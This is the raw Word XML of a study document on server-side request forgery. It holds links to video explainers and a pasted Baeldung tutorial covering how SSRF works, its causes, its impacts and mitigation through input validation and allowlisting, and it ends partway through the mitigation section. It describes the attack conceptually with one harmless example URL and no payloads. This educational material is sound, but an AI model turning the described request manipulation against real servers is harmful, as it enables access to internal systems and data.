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1E49" w14:textId="77777777" w:rsidR="006A74E5" w:rsidRDefault="006A74E5"/>
    <w:p w14:paraId="349019F7" w14:textId="77777777" w:rsidR="00F055C5" w:rsidRDefault="00F055C5"/>
    <w:p w14:paraId="2EFD5B5D" w14:textId="77777777" w:rsidR="00F055C5" w:rsidRDefault="00F055C5"/>
    <w:p w14:paraId="40A3C865" w14:textId="77777777" w:rsidR="00F055C5" w:rsidRDefault="00F055C5"/>
    <w:p w14:paraId="012FCD59" w14:textId="77777777" w:rsidR="00F055C5" w:rsidRDefault="00F055C5"/>
    <w:p w14:paraId="7A9C0A9B" w14:textId="323E425D" w:rsidR="00F055C5" w:rsidRDefault="00F055C5">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00F055C5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Cybersecurity Shorts: Day 42 - What is SSRF Vulnerabilitie? #shorts #ytshorts #cybersecurity</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="005794B1" w14:textId="4E7D5108" w:rsidR="00F055C5" w:rsidRDefault="00F055C5">
      <w:r w:rsidRPr="00F055C5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="389A6DE8" wp14:editId="457BA39C">
            <wp:extent cx="5731510" cy="4796790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="200820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08586" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4796790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D016139" w14:textId="77777777" w:rsidR="00F055C5" w:rsidRDefault="00F055C5"/>
    <w:p w14:paraId="79A1FBD2" w14:textId="77777777" w:rsidR="00F055C5" w:rsidRDefault="00F055C5"/>
    <w:p w14:paraId="71BBEF0E" w14:textId="77777777" w:rsidR="00A35AA6" w:rsidRDefault="00A35AA6"/>
    <w:p w14:paraId="0688AFE2" w14:textId="487B8ECF" w:rsidR="00A35AA6" w:rsidRDefault="00A35AA6">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00A35AA6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>SSRF in 100 seconds</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FC6BADC" w14:textId="77777777" w:rsidR="00A35AA6" w:rsidRDefault="00A35AA6"/>
    <w:p w14:paraId="1B343EBA" w14:textId="40B04C0C" w:rsidR="00A35AA6" w:rsidRDefault="00A35AA6">
      <w:r w:rsidRPr="00A35AA6">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="466243FF" wp14:editId="6A30F7F9">
            <wp:extent cx="5731510" cy="3780155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13882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8980" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3780155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40658EBF" w14:textId="77777777" w:rsidR="00A35AA6" w:rsidRDefault="00A35AA6"/>
    <w:p w14:paraId="19731AFE" w14:textId="678E3891" w:rsidR="00A35AA6" w:rsidRDefault="0002655D">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="0002655D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Server-Side Request Forgery (SSRF) | Complete Guide</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DD47325" w14:textId="146EEB56" w:rsidR="0002655D" w:rsidRDefault="0002655D">
      <w:r w:rsidRPr="0002655D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E46ED19" wp14:editId="1D5F4A9C">
            <wp:extent cx="5731510" cy="3154045"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="157230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04841" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3154045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475E07F" w14:textId="77777777" w:rsidR="0002655D" w:rsidRDefault="0002655D"/>
    <w:p w14:paraId="4B897DFE" w14:textId="77777777" w:rsidR="0002655D" w:rsidRDefault="0002655D"/>
    <w:p w14:paraId="2EEFCCF4" w14:textId="77777777" w:rsidR="00A35AA6" w:rsidRDefault="00A35AA6"/>
    <w:p w14:paraId="6D49F8E6" w14:textId="64D80112" w:rsidR="00F055C5" w:rsidRDefault="001E1307">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>SSRF and How to Prevent It? | Baeldung on Computer Science</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58B734DE" w14:textId="77777777" w:rsidR="001E1307" w:rsidRDefault="001E1307"/>
    <w:p w14:paraId="04468031" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>SSRF and How to Prevent It?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB07F97" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Last updated: May 28, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B88A4" w14:textId="3FFD12A3" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22F1D51B" wp14:editId="0DD859E3">
            <wp:extent cx="487680" cy="487680"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1781721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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855CBAE" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Written by:</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tooltip="Posts by Nduka John" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Nduka John</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E738C5A" w14:textId="45047075" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3289345E" wp14:editId="46B9126B">
            <wp:extent cx="480060" cy="480060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="209726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31DC571A" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Reviewed by:</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tooltip="Reviewed by Milos Simic" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Milos Simic</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D064467" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Security</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="247B19F5" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Security Attacks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="219F8D45" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB4B90" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Server-side request forgery is one of the dangerous </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E1307">
        <w:t> with a wrecking impact, keeping it ranking among the </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Open Worldwide Application Security Project’s</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E1307">
        <w:t> (OWASP) top ten. Attackers have used this technique to cause nefarious damage to vulnerable applications for years.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438E8F55" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF is a form of attack that enables an attacker to deceive an application server into performing malicious requests on their behalf</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t>. With this method, attackers interact with a vulnerable server, gaining access to resources hidden from external view, including the ability to read files and extract data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D7650" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>In this tutorial, we’ll discuss SSRF and explore various attack prevention methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3850B67A" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. How Does an SSRF Work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7530E1" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>In short, SSRF is an attack that lets an attacker trick a </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>web server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E1307">
        <w:t> into accessing private resources. These malicious requests can span multiple destinations, which include internal APIs, HTML pages, or databases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0D0F3" w14:textId="5855B3FB" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54AABF88" wp14:editId="14BE01BF">
            <wp:extent cx="5731510" cy="3867785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2074330397" name="Picture 8" descr="A diagram illustrating an SSRF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diagram illustrating an SSRF attack."/>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67785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BCD05F" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Here, we can see that the attacker first sends a crafted HTTP request to the vulnerable app, which then accesses the target application. Finally, the response from the target returns to the attacker, enabling them to exploit the system further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56929B09" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>For another example, let’s say a web application allows users to upload images through an external image processing service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51528FE5" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>https://example.com/process_image.php?url=externalimageprocessing.com/process/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6767260C" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>To do this, the application sends server-side requests to the external service. When a user uploads an image, the application’s server communicates with the external service to process it. Afterward, the external service responds with the processed image data, which the application handles accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2B7CBD" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>However, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>if the application is vulnerable to SSRF, an attacker can manipulate the </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> parameter to point to and gain access to an internal resource</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5D4B75" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Common Causes of SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C249773" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Generally, a</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> factor leading to SSRF vulnerability is the lack of proper validation of user input in URLs used for API requests. It can also be due to a failure to validate external entities during XML parsing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D30FB6" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Additionally, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>misconfigured APIs can lead to SSRF.</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t> When these APIs are improperly configured, they allow SSRF requests, giving attackers direct access to internal resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E998E" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:lastRenderedPageBreak/>
        <w:t>More so, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>insufficient access control can aid SSRF attacks.</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t> When these controls are inadequate or absent, attackers can exploit SSRF vulnerabilities by accessing sensitive functionalities. They can also access endpoints that normally shouldn’t be publicly accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7925874B" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Overall, these factors show how deadly SSRF vulnerabilities can be. It also exposes the importance of adhering to complete security measures in web applications to prevent breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC4369E" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. SSRF Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1570144E" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>The first step of an SSRF attack is usually for the hacker to send an HTTP request to the web server. Typically, the request contains a malicious URL or parameter. The URL can point to an internal server or resource behind a firewall. </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The attacker assumes this malicious request will go further to an internal resource via the vulnerable endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t>. If the server is unsuspecting and vulnerable, it processes the malicious request and forwards it to the specified URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C7C410" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Further, the next step is when the internal server, the target of the SSRF attack, receives the forwarded request from the vulnerable web server. </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>It processes the request, thinking it is from a legitimate source, and responds with the requested data or performs some specific action</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t>. At the end, the data from the internal server is sent to the attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B9577B" w14:textId="73525D3A" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3582A5E4" wp14:editId="34065E09">
            <wp:extent cx="5731510" cy="2222500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="115212896" name="Picture 7" descr="A Flow chart illustrating the SSRF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Flow chart illustrating the SSRF attack"/>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222500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="025DCFF8" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>This completes the SSRF attack and grants the hacker access to sensitive information or resources. It is crucial to note that the sequence is possible even when the infrastructure uses firewall protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64001F1B" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Impacts of SSRF Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6299F" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>SSRF attacks can significantly impact organizations and individuals and lead to a significant breach of the </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CIA</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E1307">
        <w:t> triad. The outcome of this event is never a good sight for companies, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>as it might cause long-term financial and reputational damage</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67AF4D" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:lastRenderedPageBreak/>
        <w:t>A successful SSRF attack can grant attackers access to resources hidden from external access. These could include internal systems like databases, admin panels, servers, and other sensitive networks. Due to unauthorized access, attackers can abuse and exploit trust relationships between internal systems, such as payment gateways and </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>authentication systems</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E1307">
        <w:t>. This window allows the attackers to execute actions posing as a trusted source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABCDE3C" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Once inside a network or platform, attackers can extract and copy sensitive data, such as customer data, staff information, internal documentation, and business secrets. They can also </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>disrupt the target company’s services</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E1307">
        <w:t> by making excessive internal requests, causing servers to become unresponsive and leading to high latency in service delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA685A8" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Additionally, attackers can gain total control of the server. With </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>privilege escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E1307">
        <w:t>, they can install malware and execute arbitrary code on the server side of the target application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01623A0E" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>As a result, an SSRF attack can have legal consequences for the affected organization. This is especially true for organizations that don’t adhere to data protection laws, as they could face huge fines or multiple suits that could force them to wind up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3059CB28" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Mitigation Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD38D7A" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>There are several popular practices and methods to prevent SSRF attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E785C1" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1. Input Validation and Whitelisting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A032C15" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>First, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>we can validate and strictly control all user-supplied input, especially URLs, to ensure they point only to expected and safe locations</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t>. Validation involves checking if URLs adhere to specific protocols, such as HTTP or HTTPS, and conform to a predefined format. Additionally, we can whitelist approved domains or IP addresses that can access the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BEFBEB" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A more advanced technique is to use regular expressions or URL parsing libraries to validate input URLs and compare them against an allowlist of approved domains or IP addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t>. This approach ensures that the structure and content of user-supplied URLs are correct and restricts requests to specific protocols and trusted destinations. Overall, it adds an extra layer of defense against SSRF attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D33B7E" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
